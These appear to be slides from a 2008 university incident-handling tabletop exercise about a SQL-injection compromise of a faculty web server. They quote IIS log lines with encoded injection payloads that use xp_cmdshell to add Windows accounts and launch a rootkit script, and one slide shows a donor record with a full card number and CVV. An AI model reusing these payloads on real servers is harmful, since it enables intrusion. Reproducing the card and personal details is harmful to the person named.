Windows Incident Handling Table Top Exercise January 9, 2008

Posted on 20-Dec-2015

Page 1: Windows Incident Handling Table Top Exercise January 9, 2008

Windows Incident Handling Table Top Exercise

January 9, 2008

Page 2

Policies, Policies, Policies and Procedures

Page 3

Information Technology Resource Use Policy 6460c
Effective Date: Nov. 3, 1997
http://www.boisestate.edu/policy/index.asp?section=6&policynum=6460

Information Privacy and Security Policy 6466a
Effective Date: Dec. 22, 2006
http://www.boisestate.edu/policy/index.asp?section=6&policynum=6466

Incident Response Procedure
Effective Date: Dec. 22, 2006 (under review)
http://boisestate.edu/oit/iso/IncidentResponseProcedureBSU.html

Incident Response Policy (under review)
http://boisestate.edu/oit/iso/incResponsePolicy.html

Data Classification Standard (under review)
http://boisestate.edu/oit/iso/DataClassificationStandardBSU.html

Drafts of IT Policy Available for Comment
http://boisestate.edu/oit/iso

Page 4

Events or Incidents?

An event is any observable occurrence in a system or network.

An incident can be thought of as a violation or imminent threat of violation of computer security policies, acceptable use policies, or standard security practices.

-- NIST Computer Security Incident Handling Guide (SP 800-61)

Page 5

Incident Handling Process

Preparation: also prevention

Identification: what has happened/is happening and why

Containment: keep the problem from spreading

Eradication: remove the problem

Recovery: return the affected server/service to production

Lessons Learned: discuss what went well and not so well to do better next time

Adapted from NIST, SANS, ITIL

Page 6

Medium size, pretty well funded college in MRUD

Ten Windows servers, Linux and Mac, too

All Windows servers are 2003 latest SP, current on patches, current and up-to-date AV
Part of MRUD AD domain

Some Windows servers are fresh installs, some are upgrades from Win2k

Six IIS servers

Two IIS servers have FP 2003 extensions
One FP virtual server for each dept and some associate college and dept activities

Two MS-SQL servers
One SQL server is backend for various home grown dept web applications

Innovative, entrepreneurial faculty
Use many student employees and "helpers" to set up web sites and web applications

Page 7

>>> David Hawley <[email protected]> 3/14/2007 9:01 AM >>>

To Whom It May Concern, I received the attached sexual spam from someone at your university. I'm letting you know because I'm sure you do not want your University to be joined in any lawsuit that may come out of this activity.
David Hawley

-----Forwarded Message-----
From: [email protected]
Sent: Mar 14, 2007 5:54 AM
To: Xqzme2
Subject: Greetings !!!

Hello ours dear member!.

Thank you for using our services! Now we represent new unique 2 sites for you. Believe, this site will not leave you cold ! Just exclusive high definition quality video. Only best for you! To your good health and prosperity ! Thanks for attention !

If you love young innocent bodies CLICK HERE. If you love skilled and mature CLICK HERE.

P.S. All our members get free unlimited BONUS ACCESS to many another perfect sites!

Page 8

not sure what to do with this...

Page 9

From: Average User
To: [email protected]
Date: 5/10/2007 10:19 AM
Subject: Fwd: Illegal content

This email does not look like it came from a reliable source. We did not open the links and are deleting this but I thought it would be good to forward on to OIT.

Thanks,

Average

Page 10

From: "Uwe Packer" <[email protected]>
To: <[email protected]>, <[email protected]>, <[email protected]>
Date: 5/9/2007 10:34 PM
Subject: Illegal content

Unfortunately I have to report that your IT services are being misused for spamming and drug sales. Would you please upgrade your security and stop this content from being distributed to minors.

Uwe

Sample post received:

May 10, 2007 at 05:22:18 propecia ([email protected])
http://modlang.boisestate.edu/_s297board/000009a5.htm

Hi! propecia [url=http://modlang.boisestate.edu/_s297board/000009a5.htm]propecia[/url] Welcome!

===

May 10, 2007 at 02:04:31 Tadalafil ([email protected])
http://modlang.boisestate.edu/_s297board/000009a4.htm?tadalafil

Hi! tadalafil as [url=http://modlang.boisestate.edu/_s297board/000009a4.htm?tadalafil]tadalafil as[/url] Waiting for you!


Page 11

From: Help Desk
To: User, Average
Date: 5/10/2007 11:02 AM
Subject: Re: Fwd: Illegal content

Hi Average,

Yes, this is a spam email. Please delete. In the future you may also forward spam emails as attachments to [email protected]

Thank you,

Techy

Page 12

From: Simon Brady <[email protected]>
To: <[email protected]>
Date: 5/13/2007 4:12 AM
Subject: Compromised Boise State website

Hi folks,

A web bulletin board run by your Modern Languages and Literatures Faculty appears to have been taken over by spammers:

http://modlang.boisestate.edu/s297board_frm.htm

Could you please pass this on to your IT security staff?

Thanks,
Simon

Page 13

Site is a web forum that anyone can post to... no username/password required.
Main site: http://modlang.boisestate.edu/webspanish/s297boardhome.htm
The main modlang site does not even seem to have a link to this forum so I'm not sure how someone would navigate to it... but all the same there are several posts from the last few days that have inappropriate wording.

Page 14

[Chart: values from 0 to 120 plotted by day, Tuesday through Friday, with 6:00 a, Noon and 6:00 p marked on the time axis]

Page 15

> From: "ernie nicholas" <[email protected]>
> Date: June 4, 2007 12:17:41 PM MDT
> To: [email protected]
> Subject: spam page
>
> Hello,
>
> The following page links to spam:
> http://www.boisestate.edu/malville/maincontent.asp?page=bgdubscr
>
> thanks

Page 16

> From: "john smith" <[email protected]>
> Date: June 8, 2007 12:17:41 PM MDT
> To: [email protected]
> Subject: spam page
>
> Hello,
>
> The following page links to spam:
> http://www.boisestate.edu/malville/maincontent.asp?page=uhlffmhy
>
> thanks

**********************************************

> From: "bob carol" <[email protected]>
> Date: June 10, 2007 2:27:31 AM MDT
> To: [email protected]
> Subject: spam page
>
> Hello,
>
> The following page links to spam:
> http://www.boisestate.edu/malville/maincontent.asp?page=bzvetcps
>
> thanks

***********************************************

> From: "ted nalice" <[email protected]>
> Date: June 14, 2007 11:12:45 PM MDT
> To: [email protected]
> Subject: spam page
>
> Hello,
>
> The following page links to spam:
> http://www.boisestate.edu/malville/maincontent.asp?page=bgdubscr
>
> thanks

Page 17

2007-05-18 18:36:44 132.178.236.60 GET /malville/maincontent.asp page=Policies'%3BINSERT+INTO+OTHERPAGES+(PAGE,CONTENT)+VALUES+(CHAR(117)%2BCHAR(104)%2BCHAR(108)%2BCHAR(102)%2BCHAR(102)%2BCHAR(109)%2BCHAR(104)%2BCHAR(121),SPACE(0))%2D%2D 80 - 83.222.16.60 Mozilla/4.0+(compatible;+MSIE+6.0;+Windows+NT+5.1) 200 0 0

Page 18

This translates to a SQL INSERT command that loads an entry and a script, "uhlffmhy", into the "OtherPages" table. The CHAR(n) values spell out the page name one ASCII character at a time, so the name never appears as plain text in the request. Then a URL like this

http://www.boisestate.edu/malville/maincontent.asp?page=uhlffmhy

redirects to an on-line pharmaceutical site.

Page 19

2007-05-21 09:24:11 132.178.236.60 GET /malville/maincontent.asp page=bzvetcps' and 1=1;declare @cmd varÐset @cmd = start wscript upwroot.vbs //BEXEC MASTER..XP_CMDSHELL @cmd;-- and '1'='1 80 - 202.96.182.225 Mozilla/4.0+(compatible;+MSIE+7.0;+Windows+NT+6.0;+SLCC1;+.NET+CLR+2.0.50727;+.NET+CLR+3.0.04506) 200 0 0

Page 20

This injection used the Malville database to upload and run a Visual Basic script that installed a rootkit after running 11 previous SQL commands to prepare the database for the script. Symantec Anti-virus did not mark or alert on the trojan programs installed by the rootkit. The rootkit then allowed remote access to the server.

Page 21

2007-05-26 17:26:12 132.178.236.60 HEAD /malville/maincontent.asp page=bgdubscr%27%3B%44%72%6F%70%20%74%61%62%6C%65%20%63%6F%6D%64%5F%6C%69%73%74%20%3B%43%52%45%41%54%45%20%54%41%42%4C%45%20%63%6F%6D%64%5F%6C%69%73%74%20%28%43%6F%6D%52%65%73%75%6C%74%20%6E%76%61%72%63%68%61%72%28%31%30%30%30%29%29%20%49%4E%53%45%52%54%20%63%6F%6D%64%5F%6C%69%73%74%20%45%58%45%43%20%4D%41%53%54%45%52%2E%2E%78%70%5F%63%6D%64%73%68%65%6C%6C%20%22%6E%65%74%20%75%73%65%72%20%72%6F%79%20%31%32%33%20%2F%61%64%64%22%2D%2D 80 - 221.201.236.13 Mozilla/3.0+(compatible;+Indy+Library) 200 0 0

Page 22

2007-05-26 17:26:12 132.178.236.60 HEAD /malville/maincontent.asp page=bgdubscr';Drop table comd_list ;CREATE TABLE comd_list (ComResult nvarchar(1000)) INSERT comd_list EXEC MASTER..xp_cmdshell "net user roy 123 /add"-- 80 - 221.201.236.13 Mozilla/3.0+(compatible;+Indy+Library) 200 0

Page 23

Mix of text and hex sent to the database:

2007-06-02 11:50:54 132.178.236.60 GET /malville/maincontent.asp page=mkvmmjvq';CREATE%20TABLE%20[X_6691]([id]%20int%20NOT%20NULL%20IDENTITY%20(1,1),%20[ResultTxt]%20nvarchar(4000)%20NULL);insert%20into%20[X_6691](ResultTxt)%20exec%20master..xp_cmdshell%20'net%20user%20iisadmin%20admin%20/add';insert%20into%20[X_6691]%20values%20('g_over');exec%20master..sp_dropextendedproc%20'xp_cmdshell'-- 80 - 125.40.210.107 Mozilla/4.0+(compatible;+MSIE+6.0;+Windows+98;+.NET+CLR+1.1.4322) 200 0 64

Translated:

2007-06-02 11:50:54 132.178.236.60 GET /malville/maincontent.asp page=mkvmmjvq';CREATE TABLE [X_6691]([id] int NOT NULL IDENTITY (1,1), [ResultTxt] nvarchar(4000) NULL);insert into [X_6691](ResultTxt) exec master..xp_cmdshell 'net user iisadmin admin /add';insert into [X_6691] values ('g_over');exec master..sp_dropextendedproc 'xp_cmdshell'-- 80 - 125.40.210.107 Mozilla/4.0+(compatible;+MSIE+6.0;+Windows+98;+.NET+CLR+1.1.4322) 200 0 64
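As an added example (not part of the original slides), a small Python checker that applies the decoding shown on slides 17, 21 and 23 to IIS W3C log lines: it URL-decodes the query field, collapses CHAR()+CHAR() concatenations into the string they build, and reports which of the injection markers seen in this incident are present. The log lines are the ones reproduced on the slides plus one constructed benign request; the indicator names and field layout assumed are this example's own.

```python
import re
from urllib.parse import unquote_plus

# IIS W3C extended log lines reproduced from the slides, plus one constructed benign
# request for contrast. Field order assumed: date time s-ip cs-method cs-uri-stem
# cs-uri-query s-port cs-username c-ip cs(User-Agent) sc-status sc-substatus sc-win32-status.
SAMPLE_LOG = [
    "2007-05-18 18:36:44 132.178.236.60 GET /malville/maincontent.asp page=Policies'%3BINSERT+INTO+OTHERPAGES+(PAGE,CONTENT)+VALUES+(CHAR(117)%2BCHAR(104)%2BCHAR(108)%2BCHAR(102)%2BCHAR(102)%2BCHAR(109)%2BCHAR(104)%2BCHAR(121),SPACE(0))%2D%2D 80 - 83.222.16.60 Mozilla/4.0+(compatible;+MSIE+6.0;+Windows+NT+5.1) 200 0 0",
    "2007-05-26 17:26:12 132.178.236.60 HEAD /malville/maincontent.asp page=bgdubscr%27%3B%44%72%6F%70%20%74%61%62%6C%65%20%63%6F%6D%64%5F%6C%69%73%74%20%3B%43%52%45%41%54%45%20%54%41%42%4C%45%20%63%6F%6D%64%5F%6C%69%73%74%20%28%43%6F%6D%52%65%73%75%6C%74%20%6E%76%61%72%63%68%61%72%28%31%30%30%30%29%29%20%49%4E%53%45%52%54%20%63%6F%6D%64%5F%6C%69%73%74%20%45%58%45%43%20%4D%41%53%54%45%52%2E%2E%78%70%5F%63%6D%64%73%68%65%6C%6C%20%22%6E%65%74%20%75%73%65%72%20%72%6F%79%20%31%32%33%20%2F%61%64%64%22%2D%2D 80 - 221.201.236.13 Mozilla/3.0+(compatible;+Indy+Library) 200 0 0",
    "2007-06-02 11:50:54 132.178.236.60 GET /malville/maincontent.asp page=mkvmmjvq';CREATE%20TABLE%20[X_6691]([id]%20int%20NOT%20NULL%20IDENTITY%20(1,1),%20[ResultTxt]%20nvarchar(4000)%20NULL);insert%20into%20[X_6691](ResultTxt)%20exec%20master..xp_cmdshell%20'net%20user%20iisadmin%20admin%20/add';insert%20into%20[X_6691]%20values%20('g_over');exec%20master..sp_dropextendedproc%20'xp_cmdshell'-- 80 - 125.40.210.107 Mozilla/4.0+(compatible;+MSIE+6.0;+Windows+98;+.NET+CLR+1.1.4322) 200 0 64",
    "2007-05-18 18:40:01 132.178.236.60 GET /malville/maincontent.asp page=Policies 80 - 10.0.0.5 Mozilla/4.0+(compatible;+MSIE+6.0) 200 0 0",  # constructed benign request
]

# A run of CHAR(n)+CHAR(n)+... as used on slide 17 to hide the page name "uhlffmhy".
CHAR_RUN = re.compile(r"CHAR\(\d+\)(?:\s*\+\s*CHAR\(\d+\))*", re.IGNORECASE)

# Injection markers seen in this incident (indicator names are this example's own).
INDICATORS = {
    "stacked_query": re.compile(r"'\s*;"),   # closes the string literal and starts a new statement
    "sql_comment": re.compile(r"--"),        # comments out the rest of the application's query
    "ddl_dml": re.compile(r"\b(?:INSERT\s+INTO|CREATE\s+TABLE|DROP\s+TABLE|INSERT\s+\w+\s+EXEC)\b", re.IGNORECASE),
    "xp_cmdshell": re.compile(r"xp_cmdshell|sp_dropextendedproc", re.IGNORECASE),
    "os_command": re.compile(r"\bnet\s+user\b|wscript", re.IGNORECASE),
}

def decode_char_runs(sql):
    """Replace CHAR(117)+CHAR(104)+... with the quoted string it builds."""
    def repl(m):
        codes = re.findall(r"\d+", m.group(0))
        return "'" + "".join(chr(int(c)) for c in codes) + "'"
    return CHAR_RUN.sub(repl, sql)

def parse_line(line):
    """Pull the fields this check needs out of a space-separated W3C line ('-' marks an empty field)."""
    f = line.split()
    return {"time": f"{f[0]} {f[1]}", "method": f[3], "stem": f[4], "query": f[5], "client": f[8]}

def analyze(line):
    """Decode one request's query string and list which indicators fire on it."""
    rec = parse_line(line)
    decoded = decode_char_runs(unquote_plus(rec["query"]))  # undo %XX and '+' first, then CHAR() runs
    hits = sorted(name for name, rx in INDICATORS.items() if rx.search(decoded))
    return {**rec, "decoded": decoded, "indicators": hits, "suspicious": bool(hits)}

def scan(lines):
    """Analyze every log line and return the records in order."""
    return [analyze(line) for line in lines]
```

Run `scan(SAMPLE_LOG)` and print the `decoded` field of each suspicious record to get the "Translated" form shown on slides 22 and 23 directly from the raw log.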

Page 24

How did this happen?

Page 25

Still, the attacker shouldn't have gotten as far as he/she did!

Page 26

Just a faculty member's pet project.

Page 27

Tables in the Malville Database:

The usual system tables and:

Checklist
CrossReferences
Feedback
OtherPages
Contributors

Page 28

For display purposes, these rows from the Contributors table are displayed as columns

id: 500
name: Thomas Smith
address: 1492 Columbus Dr.
city: Hope
state: ID
zip: 83666
hphone: 2088769821
posit: Marketing Director
empl: Coldwater Creek
wphone: 2088353009
email: [email protected] phoneDrive
amount: 750
cc: mc
ccname: Thomas L. Smith
ccnum: 4857349832681896
ccexp: 10/10/2010
cvv: 430
alum: yes
assn: yes
gyear: 1993
degree: BS
major: mktFin
spouse: Mary

Page 29

OK! You've identified the problem. How do you keep it from getting worse?

Page 30

How do you remove the pestilence?

Page 31

How and when do you get the server back in business?

Page 32

Time to go home!

Page 33

Thanks!